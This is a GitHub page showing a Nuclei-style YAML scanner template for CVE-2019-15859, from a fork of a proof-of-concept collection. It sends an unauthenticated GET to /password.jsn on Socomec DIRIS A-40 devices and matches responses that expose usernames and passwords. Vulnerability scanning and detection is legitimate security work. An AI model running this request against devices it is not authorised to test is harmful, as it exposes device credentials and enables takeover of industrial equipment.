forked from cckuailong/reapoc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2019-15859.yaml
35 lines (32 loc) · 920 Bytes
/
CVE-2019-15859.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
id: CVE-2019-15859
info:
name: Socomec DIRIS Password Disclosure
author: geeknik
description: Password disclosure in the web interface on socomec DIRIS A-40 devices before 48250501 allows a remote attacker to get full access to a device via the /password.jsn URI.
reference: https://seclists.org/fulldisclosure/2019/Oct/10
severity: critical
tags: cve,cve2019,disclosure,socomec,diris,iot
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-15859
cwe-id: CWE-200
requests:
- method: GET
path:
- "{{BaseURL}}/password.jsn"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "text/json"
part: header
- type: word
words:
- "username"
- "password"
part: body
condition: and